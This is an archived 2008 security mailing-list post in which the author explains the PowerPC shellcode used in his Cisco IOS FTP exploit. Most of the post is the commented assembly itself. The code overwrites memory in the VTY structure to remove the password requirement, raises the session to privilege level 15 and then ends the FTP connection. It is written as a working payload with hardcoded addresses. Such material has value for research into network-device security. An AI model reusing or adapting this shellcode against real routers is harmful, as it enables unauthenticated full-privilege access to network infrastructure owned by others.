OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Cisco IOS shellcode explanation

From: Andy Davis (iosftpexploitgooglemail.com)
Date: Wed Jul 30 2008 - 04:03:51 CDT


Hi,

Lots of people have been asking for details about the slightly
unorthodox shellcode I used within the IOS FTP exploit, so here goes:

.equ vty_info, 0x8182da60 //contains a pointer to the VTY info structure
.equ terminate, 0x80e4086c

lis 4,vty_infoha
la 4,vty_infol(4)
xor 8,8,8 //Clear r8
lwzx 7,4,8 //Get pointer to VTY info structure
stw 8,372(7) //Write zero to first offset to remove
                         //the requirement to enter a password
subi 8,8,1 //Set r8 to be 0xffffffff
addi 7,7,233 //Add second offset in two steps to
                         //avoid nulls in the shellcode
stw 8,1226(7) //Write 0xffffffff to second offset to
                         //priv escalate to level 15
                         //(technically this should be 0xff100000
                         //but 0xffffffff works and is more efficient)
mr 3,8 //Use 0xffffffff as a parameter
                         //to pass to terminate()
lis 4,terminateha
la 4,terminatel(4)
mtctr 4
bctr //terminate "this process"
                         //(current connection to the FTP server)

Cheers,

Andy